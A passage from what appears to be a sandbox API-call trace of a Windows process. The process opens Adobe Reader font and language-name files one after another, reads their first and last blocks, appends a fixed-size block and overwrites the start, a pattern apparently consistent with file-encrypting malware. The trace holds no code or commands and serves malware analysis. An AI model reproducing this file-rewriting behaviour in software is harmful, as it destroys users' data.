lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.241] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x11380 [0085.241] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.242] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.242] ReleaseMutex (hMutex=0x168) returned 1 [0085.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHebrew-Regular.otf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0085.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHebrew-Regular.otf", cchWideChar=23, lpMultiByteStr=0x1f88a64, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeHebrew-Regular.otf", lpUsedDefaultChar=0x0) returned 23 [0085.242] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.244] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x10380 [0085.244] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.245] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x10380 [0085.245] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.245] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.246] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.246] CloseHandle (hObject=0x1d4) returned 1 [0085.246] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Oblique.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-oblique.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.250] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.250] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x9238 [0085.250] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.250] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.250] ReleaseMutex (hMutex=0x168) returned 1 [0085.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CourierStd-Oblique.otf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0085.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CourierStd-Oblique.otf", cchWideChar=22, lpMultiByteStr=0x1f88a64, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CourierStd-Oblique.otf", lpUsedDefaultChar=0x0) returned 22 [0085.250] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.305] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x8238 [0085.306] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.306] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x8238 [0085.306] WriteFile (in: hFile=0x1d4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.306] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.306] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.307] CloseHandle (hObject=0x1d4) returned 1 [0085.307] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.308] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.308] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x17f10 [0085.308] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.308] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.308] ReleaseMutex (hMutex=0x168) returned 1 [0085.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadPro-It.otf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0085.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadPro-It.otf", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MyriadPro-It.otf", lpUsedDefaultChar=0x0) returned 16 [0085.309] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.312] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x16f10 [0085.312] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.312] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x16f10 [0085.312] WriteFile (in: hFile=0x1d4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.316] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.316] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.317] CloseHandle (hObject=0x1d4) returned 1 [0085.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.320] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.320] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6c88 [0085.320] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.320] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.321] ReleaseMutex (hMutex=0x168) returned 1 [0085.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0085.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar.txt", cchWideChar=27, lpMultiByteStr=0x1f8fc3c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar.txt", lpUsedDefaultChar=0x0) returned 27 [0085.321] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.323] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5c88 [0085.324] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.324] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5c88 [0085.324] WriteFile (in: hFile=0x1d4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.325] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.325] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.326] CloseHandle (hObject=0x1d4) returned 1 [0085.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_kw.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.328] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.328] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6c96 [0085.328] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.328] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.328] ReleaseMutex (hMutex=0x168) returned 1 [0085.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_KW.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_KW.txt", cchWideChar=30, lpMultiByteStr=0x1f8fc3c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_KW.txt", lpUsedDefaultChar=0x0) returned 30 [0085.329] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.331] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5c96 [0085.331] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.332] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5c96 [0085.332] WriteFile (in: hFile=0x1d4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.333] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.333] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.333] CloseHandle (hObject=0x1d4) returned 1 [0085.334] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sy.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.335] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.336] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6c96 [0085.336] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.336] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.336] ReleaseMutex (hMutex=0x168) returned 1 [0085.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_SY.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_SY.txt", cchWideChar=30, lpMultiByteStr=0x1f8fc3c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_SY.txt", lpUsedDefaultChar=0x0) returned 30 [0085.336] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.339] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5c96 [0085.339] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.339] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5c96 [0085.340] WriteFile (in: hFile=0x1d4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.341] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.341] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.341] CloseHandle (hObject=0x1d4) returned 1 [0085.341] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.343] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.343] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x74c0 [0085.343] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.343] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.344] ReleaseMutex (hMutex=0x168) returned 1 [0085.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.cs.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0085.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.cs.txt", cchWideChar=27, lpMultiByteStr=0x1f8fc3c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.cs.txt", lpUsedDefaultChar=0x0) returned 27 [0085.344] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.683] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x64c0 [0085.684] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.684] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x64c0 [0085.684] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.685] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.685] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.685] CloseHandle (hObject=0x1d4) returned 1 [0085.685] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.690] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.694] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6e92 [0085.699] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.706] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.709] ReleaseMutex (hMutex=0x168) returned 1 [0085.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.el_GR.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.el_GR.txt", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.el_GR.txt", lpUsedDefaultChar=0x0) returned 30 [0085.717] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.727] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5e92 [0085.727] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.727] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5e92 [0085.732] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, 